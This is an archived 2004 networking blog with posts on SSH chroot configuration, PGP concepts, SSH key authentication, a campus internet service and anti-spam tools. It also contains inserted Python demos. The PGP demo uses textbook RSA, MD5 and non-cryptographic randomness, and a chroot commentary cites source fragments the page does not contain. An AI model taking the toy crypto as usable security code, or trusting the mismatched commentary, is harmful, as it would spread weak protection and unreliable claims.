% grep -rin 'chroot' .
./FAQ:27: 2.4: Q: How do I set up chrooted accounts (w/ restricted shell access, and
./FAQ:249:Q: How do I set up chrooted accounts (with restricted shell access, and
./lib/sshsession/sshunixuser.c:1427: const char *chroot_dir,
./lib/sshsession/sshunixuser.c:1522: /* chrooting at this point. */
./lib/sshsession/sshunixuser.c:1523: if (chroot_dir)
./lib/sshsession/sshunixuser.c:1525: if (chroot(chroot_dir) < 0)
./lib/sshsession/sshunixuser.c:1527: ssh_warning("Chroot to '%s' failed!", chroot_dir);
./lib/sshsession/sshunixuser.c:1536: /* XXX does chroot work after this? If not, this should be done after
./lib/sshsession/sshunixuser.c:1537: chroot (and before setuid()). */
./lib/sshsession/sshuser.h:95: called before chroot()ing. */
./lib/sshsession/sshuser.h:101: ``chroot_dir'' call chroot() with this as argument in the approriate
./lib/sshsession/sshuser.h:103: the user. Will return FALSE, if chroot() fails. Note
./lib/sshsession/sshuser.h:106: be NULL, in which case the user is not chrooted.
./lib/sshsession/sshuser.h:114: const char *chroot_dir,
./NEWS:4:ssh-pubkeymgr and ssh-chrootmgr
./apps/ssh/sshchsession.c:248:/* Return TRUE if user is configured to have home directory chrooted. */
./apps/ssh/sshchsession.c:250:Boolean ssh_user_needs_chroot(SshUser user, SshCommon common);
./apps/ssh/sshchsession.c:252:/* Return TRUE if user is configured to have home directory chrooted. */
./apps/ssh/sshchsession.c:254:Boolean ssh_user_needs_chroot(SshUser uc, SshCommon common)
./apps/ssh/sshchsession.c:257: "won't be chrooted",
./apps/ssh/sshchsession.c:258: "will be chrooted",
./apps/ssh/sshchsession.c:262: common->config->chroot_users,
./apps/ssh/sshchsession.c:264: common->config->chroot_groups);
./apps/ssh/sshchsession.c:492: if (ssh_user_needs_chroot(session->common->user_data, session->common))
./apps/ssh/sshchsession.c:849: Boolean needs_chroot = FALSE, run_internal_sftp_server = FALSE;
./apps/ssh/sshchsession.c:850: const char *chroot_dir = NULL;
./apps/ssh/sshchsession.c:901: needs_chroot = ssh_user_needs_chroot(session->common->user_data,
./apps/ssh/sshchsession.c:922: if (needs_chroot)
./apps/ssh/sshchsession.c:924: chroot_dir = ssh_user_dir(session->common->user_data);
./apps/ssh/sshchsession.c:926: "User '%s' will be chrooted to directory '%s'.",
./apps/ssh/sshchsession.c:927: ssh_user_name(session->common->user_data), chroot_dir);
./apps/ssh/sshchsession.c:931: and chroots, as needed. */
./apps/ssh/sshchsession.c:933: chroot_dir, close_fds, session))
./apps/ssh/sshchsession.c:935: ssh_debug("Switching to user '%s' (with chroot) failed!",
./apps/ssh/sshchsession.c:962: if (needs_chroot)
./apps/ssh/sshchsession.c:966: ssh_debug("Chroot to user '%s' home directory failed!",
./apps/ssh/sshchsession.c:1188: (needs_chroot ? "" :
./apps/ssh/sftp-server2.c:92: XXX Logging in a chrooted environment is a _major_ pain in the
./apps/ssh/sshconfig.c:1675: ADD_PARAM_PATTERN_LIST("ChrootUsers", &config->chroot_users, 0);
./apps/ssh/sshconfig.c:1676: ADD_PARAM_PATTERN_LIST("ChrootGroups", &config->chroot_groups, 0);
./apps/ssh/sshconfig.c:2111: config->chroot_users = NULL;
./apps/ssh/sshconfig.c:2112: config->chroot_groups = NULL;
./apps/ssh/sshconfig.c:2451: ssh_adt_destroy(config->chroot_users);
./apps/ssh/sshconfig.c:2452: ssh_adt_destroy(config->chroot_groups);
./apps/ssh/sshconfig.h:255: SshADTContainer chroot_users;
./apps/ssh/sshconfig.h:256: SshADTContainer chroot_groups;
./apps/ssh/sshd2_subconfig.5:208:.B ChrootGroups
./apps/ssh/sshd2_subconfig.5:210:.B ChrootUsers
./apps/ssh/sshd2_config:174:## Chrooted environment
./apps/ssh/sshd2_config:176:# ChRootUsers anonymous,ftp,guest
./apps/ssh/sshd2_config:177:# ChRootGroups sftp,guest
./apps/ssh/subconfig/host_ext.example:17: ChrootGroups anonymous,sftp
./apps/ssh/subconfig/anonymous.example:11:## /etc/passwd file. Chroot this user in main sshd2_config or host
./apps/ssh/sshd-check-conf.5:52:.BR ChrootUsers ,
./apps/ssh/sshd-check-conf.5:53:.BR ChrootGroups ,
./apps/ssh/sshd-check-conf.c:117: "won't be chrooted",
./apps/ssh/sshd-check-conf.c:118: "will be chrooted",
./apps/ssh/sshd-check-conf.c:121: config->chroot_users,
./apps/ssh/sshd-check-conf.c:123: config->chroot_groups))
./apps/ssh/sshd-check-conf.c:124: ssh_informational(" User %s will be chrooted.\r\n", user);
./apps/ssh/sshd-check-conf.c:126: ssh_informational(" User %s will not be chrooted.\r\n", user);
./apps/ssh/sshd-check-conf.c:453: DUMP_PATTERN_LIST("ChrootUsers", config->chroot_users);
./apps/ssh/sshd-check-conf.c:454: DUMP_PATTERN_LIST("ChrootGroups", config->chroot_groups);
./apps/ssh/sshd2_config.5:315:.B ChRootGroups
./apps/ssh/sshd2_config.5:316:This option works like \fBChRootUsers\fR, except that it can be used
./apps/ssh/sshd2_config.5:322:.B ChRootUsers
./apps/ssh/sshd2_config.5:324:gives all users listed here a chrooted environment (e.g. "/home").
./apps/ssh/sshd2_config.5:971:requests. This enables better logging in chrooted environments, and
./README:346: * For detailed info on how to set up chrooted accounts, see
./README:411: needed in order to chroot sftp users, see FAQ).
./HOWTO.anonymous.sftp:13: found by ssh-dummy-shell and sftp-server in the chrooted
./HOWTO.anonymous.sftp:18: chrooting considerably. You don't need to build the static binaries.
./HOWTO.anonymous.sftp:27: chrooted environment, so choose wisely (you can change it later, of
./HOWTO.anonymous.sftp:41: % ssh-chrootmgr -v ssh-guest # (or the account you created)
./HOWTO.anonymous.sftp:51: ChRootUsers ssh-guest
./HOWTO.anonymous.sftp:93: Note, that logging in the chrooted environment with a separate
./HOWTO.anonymous.sftp:95: /dev/log device under the chrooted jail, and add that to the listened
./HOWTO.anonymous.sftp:100: Logging in the chrooted jail is much simpler with the internal
./projects/ssh-f-configd/fsma-oids/sshd2.oid:31:1.3.6.1.4.1.2213.36.1.2.7.5 ChRootUsers
./projects/ssh-f-configd/fsma-oids/sshd2.oid:32:1.3.6.1.4.1.2213.36.1.2.7.6 ChRootGroups
./CHANGES:160: * Removed ssh-pubkeymgr and ssh-chrootmgr from the distribution
./CHANGES:269: that chroot() was not done.
./CHANGES:516: * sshd2: Changed chroot() logic. Now secondary groups will be
./CHANGES:517: initialized after chrooting, without the need to copy /etc/group
./CHANGES:518: to the chroot jail.
./CHANGES:1012: groups in the configuration (ie. ChrootGroups, AllowGroups, etc).
./CHANGES:1128: * Added ssh-chrootmgr, a simple script to help in setting up
./CHANGES:1129: chrooted environments for users.
./CHANGES:1135: ChRoot{Users,Groups}. Currently only works (that I know of) in GCC
./CHANGES:1193: * Fixed a bug in ChRootGroups, which basically rendered it useless.
./CHANGES:1260: * Previous by tri: implemented ChRootGroups and ChRootUsers
Posted by windtear at 1:25 AM
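The two source fragments above differ in what HOME the chrooted session sees (flyriver's v2.4.0 patch exports /home/<user>, a path that does not exist inside the jail; 3.2.9.1 exports "/"), and the CHANGES entry notes that secondary groups are now initialised after chrooting so /etc/group need not be copied into the jail. The following is an added example, written for this page and not taken from the ssh2 sources, of the order of operations a daemon should follow when confining a session to the user's home directory; the helper names (session_home, jail_dir_ok, enter_jail) are mine, and enter_jail needs root to actually do anything:

```python
"""Added example (not from the ssh2 sources): confining a session to a user's
home directory in the order sshd2's ChRootGroups handling implies.
Helper names are this example's own."""
import os
import pwd
import sys


def session_home(user_dir, needs_chroot):
    """HOME as seen from inside the session.  The 3.2.9.1 code quoted above sets
    user_dir = "/" for a chrooted user because the jail root *is* the home
    directory; exporting "/home/<user>" instead names a path that does not
    exist inside the jail."""
    return "/" if needs_chroot else user_dir


def jail_dir_ok(path):
    """Refuse jail paths that would confine nothing or walk upwards."""
    if not path or not path.startswith("/"):
        return False
    if path == "/" or ".." in path.split("/"):
        return False
    return True


def enter_jail(pw, jail_dir=None):
    """Confine the calling process to jail_dir (default: pw.pw_dir) and drop to
    pw's identity.  Needs root.  Returns the supplementary group list applied.

    Supplementary groups are resolved *before* chroot(), while /etc/group is
    still visible, and applied *after* it, which is the design the CHANGES
    entry above describes (no /etc/group copy in the jail)."""
    jail = jail_dir or pw.pw_dir
    if not jail_dir_ok(jail):
        raise ValueError("bad jail directory: %r" % (jail,))
    if pw.pw_uid == 0:
        raise ValueError("chroot is not a boundary for uid 0; refuse")
    groups = os.getgrouplist(pw.pw_name, pw.pw_gid)
    os.chdir(jail)          # cwd inside the new root before chroot()
    os.chroot(jail)
    os.chdir("/")           # never keep a cwd that still points outside the jail
    os.setgroups(groups)    # after chroot, as the CHANGES entry says
    os.setgid(pw.pw_gid)
    os.setuid(pw.pw_uid)
    # The drop must be irreversible: regaining uid 0 has to fail.
    try:
        os.setuid(0)
    except PermissionError:
        return groups
    raise RuntimeError("privilege drop did not stick")


if __name__ == "__main__":
    # usage (as root): python3 jail.py <user>
    entry = pwd.getpwnam(sys.argv[1])
    applied = enter_jail(entry)
    print("uid=%d in jail, groups=%r, HOME=%s"
          % (os.getuid(), applied, session_home(entry.pw_dir, True)))
```

The checks in jail_dir_ok are deliberately strict: a jail of "/" or a path containing ".." is rejected before any privileged call is made, and a request to jail uid 0 is refused because root can leave a chroot.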
April 13, 2004
PGP Freeware & PGP Public Key Server I Love Networking
http://www.pgpi.org/products/pgp/versions/freeware/
Freeware PGP versions: Amiga (8), Atari (6), BeOS (5), EPOC (Psion etc.), MacOS (22), MS-DOS (9), Newton, OS/2 (6), PalmOS (2), Unix (19), Windows 2000 (5), Windows 3.x (2), Windows 95/98/NT (31), Windows ME (3), Windows XP (4)
http://www.pgp.com/products/freeware.html
PGP 8.0.3 Freeware for Windows
http://download.pgp.com/products/desktop/freeware/PGP803-PF-W.zip
More...Posted by windtear at 12:25 AM
April 12, 2004
*.ipchina.org domains exceed 2000 I Love Networking
Welcome to Windtear's Free Domain Service
ipchina.org domain system {provides free *.ipchina.org domains}
http://domain.ipcn.org/ http://domain.ipchina.org/
Total users / total domains (of which subdomains): 1635 / 2005 (156)
ipchina.org domain system FAQ
2004-2-27 11:43 Domain changes now take effect daily at midnight
2003-6-14 16:45 Updated this file; half-year anniversary of operation: 645 registered users, 5 users still not activated after two days, 908 domains in total!
2003-4-13 This maintenance page is now reachable from abroad; overseas users can also make changes via http://domain.ipchina.org/
2002-12-17 21:42 If you cannot set up, or have not set up, your own DNS server, choose Static when applying
More...Posted by windtear at 11:44 AM
PGP (Pretty Good Privacy) I Love Networking
-----> first
gpg: GnuPG, GNU Privacy Guard; pgp: Pretty Good Privacy
The previous article, "keychain - a strong case for RSA/DSA key authentication", already mentioned:
gpg --keyserver pgp.mit.edu --recv-key 302A3876
wget -O - http://dev.gentoo.org/~rajiv/rajivmanglani-pubkey.asc | gpg --import
i.e. use gpg (GnuPG) to import the PGP key.
-----> PGP
By Phil Zimmermann: (e-mail) signing and encryption software based on the RSA public-key cryptosystem.
PGP combines the advantages of conventional encryption and public-key encryption: it keeps the speed of the conventional method while gaining the convenience of the public-key method (conventional encryption is roughly 1000 times faster than public-key encryption).
PGP has a clever design for digital signatures and key certification management.
Encrypting with RSA solves message confidentiality, but cannot establish who sent the message; a signature is needed.
Signing: A encrypts the 128-bit digest of the message with A's own private key and appends it to the mail, then encrypts the whole mail with B's public key.
When B receives the ciphertext, B decrypts the mail with B's private key, obtaining A's plaintext and the signature. B's PGP also computes a 128-bit digest from the plaintext and compares it with the value obtained by decrypting the signature with A's public key; if they match, the mail really did come from A. Both security requirements are thus satisfied.
Signing is solved, but encrypting the whole mail with B's public key is too slow... For speed, the message is not encrypted with RSA but with a random key and a conventional cipher.
The random key encrypts the plaintext with the conventional IDEA algorithm, and that key is then encrypted with RSA.
look: the confidentiality of the RSA system together with the speed of IDEA.
Random key: a 128-bit session key (sek = session key).
The actual process: (compress the plaintext with the PKZIP algorithm) encrypt the compressed plaintext with IDEA under the random key -> More...Posted by windtear at 1:06 AM
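The sign-then-hybrid-encrypt flow described above, as an added illustration that is not part of the original post: textbook RSA on small generated keys, MD5 for the 128-bit digest, zlib in place of PKZIP compression, and a SHA-256 counter-mode keystream standing in for IDEA. Key sizes, padding and the ciphers are simplifications chosen to keep the example self-contained; nothing here interoperates with real PGP.

```python
import hashlib
import random
import zlib

# Textbook RSA on small keys. Real PGP uses far longer keys plus padding, and
# the random module is not a CSPRNG; both are acceptable only for a demo.
_SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def _is_probable_prime(n, rounds=20):
    """Miller-Rabin after cheap trial division."""
    for p in _SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits):
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def rsa_keygen(bits=512):
    """Return ((n, e), (n, d)); 512 bits keeps the demo fast (Python 3.8+ for pow(e, -1, phi))."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:  # e is prime, so this is gcd(e, phi) == 1
            break
    return (p * q, e), (p * q, pow(e, -1, phi))


def _stream_xor(key, data):
    """Stand-in for IDEA: SHA-256 counter-mode keystream XORed over data."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def _digest_int(message):
    """The 128-bit message digest the post describes (MD5 here, demo only)."""
    return int.from_bytes(hashlib.md5(message).digest(), "big")


def pgp_send(message, sender_priv, recipient_pub):
    """A -> B: sign the digest with A's private key, compress, encrypt under a
    random 128-bit session key, and encrypt only that key with B's public key."""
    n_a, d_a = sender_priv
    n_b, e_b = recipient_pub
    sig = pow(_digest_int(message), d_a, n_a)
    sig_bytes = sig.to_bytes((n_a.bit_length() + 7) // 8, "big")
    packet = zlib.compress(sig_bytes + message)          # the "PKZIP" step
    sek = random.getrandbits(128).to_bytes(16, "big")    # session key (sek)
    body = _stream_xor(sek, packet)                      # the "IDEA" step
    sek_enc = pow(int.from_bytes(sek, "big"), e_b, n_b)  # RSA only on the key
    return {"sek_enc": sek_enc, "body": body, "sig_len": len(sig_bytes)}


def pgp_receive(envelope, recipient_priv, sender_pub):
    """B: recover the session key with B's private key, decrypt and decompress,
    then compare a fresh digest with the signature opened by A's public key.
    Returns (message, signature_valid)."""
    n_b, d_b = recipient_priv
    n_a, e_a = sender_pub
    sek = pow(envelope["sek_enc"], d_b, n_b).to_bytes(16, "big")
    packet = zlib.decompress(_stream_xor(sek, envelope["body"]))
    sig_bytes, message = packet[:envelope["sig_len"]], packet[envelope["sig_len"]:]
    recovered = pow(int.from_bytes(sig_bytes, "big"), e_a, n_a)
    return message, recovered == _digest_int(message)


if __name__ == "__main__":
    a_pub, a_priv = rsa_keygen()   # A signs and sends
    b_pub, b_priv = rsa_keygen()   # B receives
    env = pgp_send(b"meet at noon", a_priv, b_pub)
    print(pgp_receive(env, b_priv, a_pub))   # (b'meet at noon', True)
```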
April 11, 2004
keychain - a strong case for RSA/DSA key authentication I Love Networking
keychain - a strong case for RSA/DSA key authentication
Keychain http://www.gentoo.org/proj/en/keychain.xml
-----> what
The keychain bash script makes handling RSA and DSA keys both convenient and secure. It acts as a front-end to ssh-agent, allowing you to easily have one long-running ssh-agent process per system, rather than per login session. This dramatically reduces the number of times you need to enter your passphrase from More...Posted by windtear at 1:28 AM
RSA/DSA key authentication demo - SecureCRT & PuTTY & ssh I Love Networking
SecureCRT:
@SSH1 Cipher 3DES, Authentication RSA (Password & TIS)
D:\Documents and Settings\Administrator\Application Data\Van Dyke Technologies\SecureCRT\Identity
Identity, Identity.pub
Identity.pub as /root/.ssh/authorized_keys
...
@SSH2 Authentication Primary PublicKey (Password & KeyboardInteractive)
PuTTY:
@SSH1 (puttygen.exe generates the key pair)
E:\Software\Network\putty\0.54\id_rsa.ppk
E:\Software\Network\putty\0.54\id_rsa.pub
id_rsa.pub as /root/.ssh/authorized_keys
@SSH2 ...
-----> PuTTY http://www.chiark.greenend.org.uk/~sgtatham/putty/
PuTTY: A Free Telnet/SSH Client
More...Posted by windtear at 1:06 AM
RSA/DSA key authentication in place of standard password authentication I Love Networking
RSA key pair generation @ SSH1
% ssh-keygen -t rsa
.ssh/id_rsa
.ssh/id_rsa.pub
% scp ~/.ssh/id_rsa.pub remote:
as ~/.ssh/authorized_keys
% ssh -1 remote
done (the server must allow RSAAuthentication)
DSA key generation @ SSH2
% ssh-keygen -t dsa
.ssh/id_dsa
.ssh/id_dsa.pub
transfer to remote as ~/.ssh/authorized_keys2
...
% ssh remote
Enter passphrase for key '/root/.ssh/id_rsa':
root@remote's password:
Permission denied, please try again.
root@remote's password:
% ssh remote
Enter passphrase for key '/root/.ssh/id_rsa':
Last login: Sat Apr 10 21:55:10 2004 from tuxxxxxx.tsinghua.edu.cn
when the passphrase is empty, passwordless authentication is convenient, but very very very bad
so
% ssh-agent
SSH_AUTH_SOCK=/tmp/ssh-XXIyUus1/agent.7245; export SSH_AUTH_SOCK;
SSH_AGENT_PID=7246; export SSH_AGENT_PID;
echo Agent pid 7246;
7246 ? S 0:00 ssh-agent
we should
% eval `ssh-agent`
Agent pid 7290
% ssh-add
Enter passphrase for /root/.ssh/id_rsa:
Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)
% ssh remote
Last login: Sun Apr 11 00:23:29 2004 from tuxxxxxx.tsinghua.edu.cn
as you can see, eval `ssh-agent` & ssh-add is very very inconvenient
the saviour is coming: keychain
More...Posted by windtear at 12:39 AM
Challenging security - the RSA/DSA key system I Love Networking
Conventional encryption is also called secret-key or symmetric encryption: encryption and decryption use the same key. The Data Encryption Standard (DES) is a conventional method; an extremely simple example is the transposition cipher.
Public-key encryption solves the key-distribution problem: the public key is published, the private key decrypts. The concept of the public key was proposed by Whitfield Diffie and Martin Hellman in 1975.
Elgamal is named after its inventor Taher Elgamal. RSA: inventors Ron Rivest, Adi Shamir, and Leonard Adleman. Diffie-Hellman is named after its inventors. DSA, the Digital Signature Algorithm: inventor David Kravitz.
The RSA (Rivest-Shamir-Adleman) algorithm is a public-key system resting on the assumption that a large number cannot be factored into primes. To send someone an encrypted message, first find his public key, then encrypt the message with it; nobody but him has the key to decrypt it, so nobody else can read the message.
In 1997 the RSA organisation published the key-length standards of the time: 768-bit keys for individuals, 1024-bit keys for companies, and 2048-bit keys for a few very important institutions.
Today RSA is widely used in all kinds of security and authentication areas, such as web server and browser security, e-mail security and authentication, securing remote logins, and as the core of various electronic credit card systems:
web server and browser security (covered separately, see "CA certificates for the apache server")
PGP (Pretty Good Privacy), an e-mail encryption program based on the RSA public-key system (covered separately)
the RSA/DSA key authentication system, which can replace the standard password authentication system (covered separately)
More...Posted by windtear at 12:03 AM
April 10, 2004
Getting on MSN @CERNET via Microsoft's official proxy 202.194.15.124:8080 I Love Networking
202.194.15.124:8080, provided by Microsoft, lets you get on MSN and visit the following sites:
Microsoft corporate site www.microsoft.com
Microsoft developer site http://msdn.microsoft.com/
the world's largest .NET community www.gotdotnet.com
the well-known ASP.net community www.asp.net
the student technical discussion site www.thespoke.net
the Microsoft global student software development contest site www.imaginecup.com
-----> http://mscenter.edu.cn/msdoor/
.microsoft.com .passport.com .passport.net .passportimages.com .windowsupdate.com .hotmail.com .msn.com .msdnaa.net .interactservices.com .thespoke.net .gotdotnet.com .asp.net .wimdows.net .worldofdotnet.net .wimdows.net .c-sharpcorner.com .imaginecup.com
Step 4: choose the site you like. We currently provide access to the following sites: Microsoft corporate site http://www.microsoft.com; Microsoft developer site http://msdn.microsoft.com; the largest .NET community http://www.gotdotnet.com; ASP.net community http://www.asp.net; student technical discussion site http://www.thespoke.net; Microsoft global student software development contest site http://www.imaginecup.com; MSN messenger http://www.msn.com
You can also visit the following sites: http://www.c-sharpcorner.com http://www.wimdows.net http://www.worldofdotnet.net http://www.wimdows.net http://www.w3c.org
More...Posted by windtear at 1:03 AM
Fighting the virus: shut down TCP/445 I Love Networking
Over the last few days a virus targeting TCP/445 has been on the rise; just in case, shut the port down and be done with it:
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"SMBDeviceEnabled"=dword:00000000
More...Posted by windtear at 12:59 AM
April 9, 2004
Campus network monthly-card Internet service for individual users: an unofficial reading I Love Networking
From: windtear (grinding away at the thesis), Board: THUNet
Subject: Campus network monthly-card Internet service for individual users: an unofficial reading
Posted at: BBS SMTH (Fri Apr 9 10:20:19 2004), forwarded
This reading is my personal take, not an announcement from the Network Center; it is for orientation only, analyse the announcement yourself.
1. No traffic accounting; running proxies or otherwise sharing monthly-card resources is not allowed
2. 80 hours / 30 yuan; 160 hours / 50 yuan; unlimited time and traffic / 90 yuan
3. The existing TUNet account/network fees cannot be used; you must go to Room 209 of the Central Main Building to pay for a "monthly card"
4. A month runs until the same day and time of the following month
5. Bring two documents to the Network Center account office (Central Main Building Room 208) to open a monthly-card account. Staff: ID card + work permit; students: ID card + student card; retirees: ID card + retirement certificate; visiting scholars and temporary personnel: ID card + letter of introduction from the supervising department.
6. Login is the same as the existing TUNet method; remember to use the newly opened monthly-card account, and remember to disconnect!!!
7. Special reminder: top up in time! Otherwise the excess is charged at 1 yuan per hour
From: windtear (grinding away at the thesis), Board: THUNet
Subject: [Repost] The Network Center opens a monthly-card Internet service for individual campus network users
Posted at: BBS SMTH (Fri Apr 9 10:08:12 2004), forwarded
Reposted without liability; the original governs: http://netsupport.tsinghua.edu.cn/baoyue.htm
The Network Center opens a monthly-card Internet service for individual campus network users
With strong support from CERNET and the university's approval, the Network Center will offer the "campus network monthly-card Internet service for individual users" from April 12, 2004. All students and staff of the university may choose this service.
n Monthly-card tariffs. Type / Price (yuan/month/person): monthly, limited to 80 hours: 30; monthly, limited to 160 hours: 50; monthly, unlimited: 90. The service is billed by time, not by traffic, with no distinction between domestic and international. Users of the monthly-card service are strictly forbidden to run proxy services or to make the connectivity provided by the personal monthly card available to others in any way; on discovery the Network Center will stop providing Internet service to them.
n Application procedure
1. First-time application: the user must apply for a new account dedicated to the monthly-card service. ① Bring two documents to the Network Center account office (Central Main Building Room 208) to open a monthly-card account. Staff: ID card + work permit; students: ID card + student card; retirees: ID card + retirement certificate; visiting scholars and temporary personnel: ID card + letter of introduction from the supervising department. ② The user fills in and signs the "Tsinghua University campus network individual user monthly-card account registration form". ③ Obtain the monthly-card account/password from the administrator (the user's existing campus network account is used only for services other than the monthly-card service).
2. Go to the Network Center accounting office (Central Main Building Room 209) to pay for a "monthly card". For subsequent purchases, buy directly at the Network Center accounting office (Central Main Building Room 209) against the monthly-card account. The "monthly card" is a virtual card; each card has one card number (serial number). After paying, the user can look up the purchased card numbers on the "monthly card query" page at https://usereg.tsinghua.edu.cn. A user may buy several "cards" at once; the "order of use" must be decided at purchase time, and when the current card runs over, the system automatically activates the next card in that order. If the monthly-card account is already overdrawn, the debt on the account must be settled before buying another card.
n Usage. The user logs in with the monthly-card account/password through the Tsinghua University campus network login client, or via https://usereg.tsinghua.edu.cn. On the user's first login the system automatically activates the monthly card with the lowest "order of use" number. Password changes, card information and online-time queries are at https://usereg.tsinghua.edu.cn. If you forget the password, bring your ID card to the Network Center account office (Central Main Building Room 208) to reset it.
n Billing. The card's month runs from the moment the user actually activates it until the same day and time of the following month, timed precisely (for example, if a user buys a one-month card and activates it at 10:10 on 2004-2-24, the card can be used until 10:10 on 2004-3-24; if activated at 10:10 on 2004-1-31, it can be used until 10:10 on 2004-2-29). If usage exceeds the card's limit (total time exceeded or card expired) and there is no other "available" card, the excess is charged at 1 yuan per hour, counted in whole hours; fractions under one hour are not charged. If the "current card" has been overrun by 1 hour and the account has other "available" cards, the system automatically activates the card with the lowest "order of use" number.
n Notes
1. The monthly card is for the holder's use only; running proxy services or making the card's connectivity available to others in any way is prohibited, and on discovery will be handled under the terms of the "Tsinghua University campus network individual user monthly-card account registration form".
2. The system starts timing from the moment the user logs in, not by traffic and with no domestic/international distinction; "disconnect" stops the current timing.
3. Special reminder: when logging in via the https://usereg.tsinghua.edu.cn page, be sure to return to that page and "disconnect" when finished. Without "disconnecting" on the page, the system will not stop timing even if you shut down your own computer.
4. Once used, a monthly card cannot be "returned or exchanged".
Tsinghua University Information Network Engineering Research Center, April 2004 More...Posted by windtear at 10:37 AM
April 8, 2004
smartmontools (smartctl and smartd) - SMART I Love Networking
http://smartmontools.sourceforge.net/ The smartmontools package contains two utility programs (smartctl and smartd) to control and monitor storage systems using the Self-Monitoring, Analysis and Reporting Technology System (SMART) built into most modern ATA and SCSI hard disks. In many cases, these utilities will provide advanced warning of disk degradation and failure. Smartmontools is derived from the smartsuite package, and includes support More...Posted by windtear at 12:52 AM
April 7, 2004
[IPCN] *.ipchina.org dynamic domain system code release domain-v1.0.0 I Love Networking
ipchina.org domain system {provides free *.ipchina.org domains}
http://domain.ipcn.org/ http://domain.ipchina.org/
In production since 2002-12-14: total users 1598; total domains (of which subdomains) 1980 (155).
Many friends have asked for the code, so version 1.0.0 is released publicly here; everyone is welcome to modify and improve it.
Download: http://ipcn.org/domain-v1.0.0.tgz
-----> README
A php/mysql-based dynamic domain system <windtear at ipcn dot org>
Version 1.0.0 released publicly by windtear on 2004-04-07; this is roughly the code of the *.ipchina.org dynamic domain system, which has been in production since 2002-12-14.
The php part uses the code framework of the China BBS relay system <http://cn-bbs.org>, with the relay-related code removed and the database redesigned to separate users from domains; update scripts based on perl/bash are provided.
Installation: see INSTALL (index.php is the simplest one given; modify it yourself)
http://www.smth.org/pc/pccon.php?id=10&nid=4329&order=&tid=12
Technical implementation of the *.ipchina.org domain system
User-interface main server: Redhat 7.3; BIND name server; mysql database; apache+php for user registration and activation, domain registration, modification, deletion, user management ...; sh + perl to watch for database changes and generate the domain configuration. The whole process is user self-service; a scheduled task on the server monitors and updates. Four further servers take part in resolution (with view support).
There are nearly 20 php files; some are described here:
|-- signup.php user registration
|-- active.php user activation
|-- login.php login page
|-- list.php domain list (with delete) (default page after login)
|-- index.php home page: redirects to list.php or login.php depending on login state
|-- header.php shared header
|-- footer.php shared footer
|-- changeinfo.php change personal information
|-- lostpw.php lost-password recovery page
|-- add.php add a domain
|-- modify.php modify a domain
|-- config.php system configuration
|-- db_mysql.php database connection
|-- help.php help
`-- faq help file
The admin part is omitted for now: user management, domain management, cross queries, configuration view, etc.
Three database tables: user (user information), ns (domain information), myns (reserved domain information)
--- admin view: admin.php, a simple viewer
update.sh automatic update script, add to crontab (calls get_mysql_data.pl and gen_bind_data.pl)
manual_update.sh manual update script
get_mysql_data.pl reads mysql data into 2.txt, for comparing data changes and inspection
gen_bind_data.pl generates the bind data
-----> INSTALL
Configure the www server. Configure the mysql server and create the tables with structure.sql. Edit config.php. Edit head.ipchina.org. Edit faq, header.php, footer.php and signup.php to your own information (index.php is the simplest one given; modify it yourself).
-----> ChangeLog
2004-04-07 windtear first release domain-v1.0.0
-----> TODO
1. Complete the admin code
2. Add JavaScript for more client-side checks
3. Tidy the code and adjust part of the structure
-----> AUTHORS
windtear <windtear at ipcn dot org>
hightman <hightman dot bbs at bbs dot hightman dot net>
Czz <czz at cn-bbs dot org>
More...Posted by windtear at 8:44 PM
AntiSpam - C/R System - TMDA - wle - anti-spam I Love Networking
Viruses we must fight, whether computer viruses or biological ones; spam we must fight too.
Here are two C/R System anti-spam works for Linux; you can also write your own in a scripting language such as perl.
C/R: Challenge/Response, an e-mail confirmation system.
Many mature mail systems have filtering mechanisms: keyword matching, address matching ...... A simple keyword-filter sample is given at the end.
-----> TMDA 1.0.2
http://tmda.net/
Tagged Message Delivery Agent (TMDA)
Copyright (C) 2001,2002,2003 Jason R. Mastaler <jason@mastaler.com>
This software is OSI Certified Open Source Software. OSI Certified is a certification mark of the Open Source Initiative.
TMDA is an open source software application designed to significantly reduce the amount of spam (Internet junk-mail) you receive. TMDA strives to be more effective, yet less time-consuming than traditional spam filters. TMDA can also be used as a general purpose local mail delivery agent to filter, sort, deliver and dispose of incoming mail.
The technical countermeasures used by TMDA to thwart spam include:
* whitelists: accept mail from known, trusted senders.
* blacklists: refuse mail from undesired senders.
* challenge/response: allows unknown senders which aren't on the whitelist or blacklist the chance to confirm that their message is legitimate (non-spam).
* tagged addresses: special-purpose e-mail addresses such as time-dependent addresses, or addresses which only accept certain kinds of communication. These increase the transparency of TMDA for unknown senders by allowing them to safely circumvent the challenge/response system.
For more information, visit the TMDA homepage: <URL:http://tmda.net/>
Information on the TMDA mailing lists can be found at: <URL:http://tmda.net/lists/listinfo/>
INSTALL says how to install and configure TMDA. UPGRADE contains upgrade instructions from selected releases. CRYPTO explains the cryptography used in TMDA. THANKS contains acknowledgments and thanks. COPYING contains licensing information.
-----> wle 0.3
http://www.rfc1149.net/sam http://www.rfc1149.net/devel/wle
This is the WLE (White List Email) program, designed to keep unsolicited mails far from your mailbox.
This is a prerelease: the program works for me, but it is not guaranteed to work for anyone else. Moreover, there is no express setup nor any configuration guide. Have a look at the INSTALL and sample-* files for basic instructions.
Samuel Tardieu, sam@rfc1149.net, http://www.rfc1149.net/sam
-----> a MTA filter sample
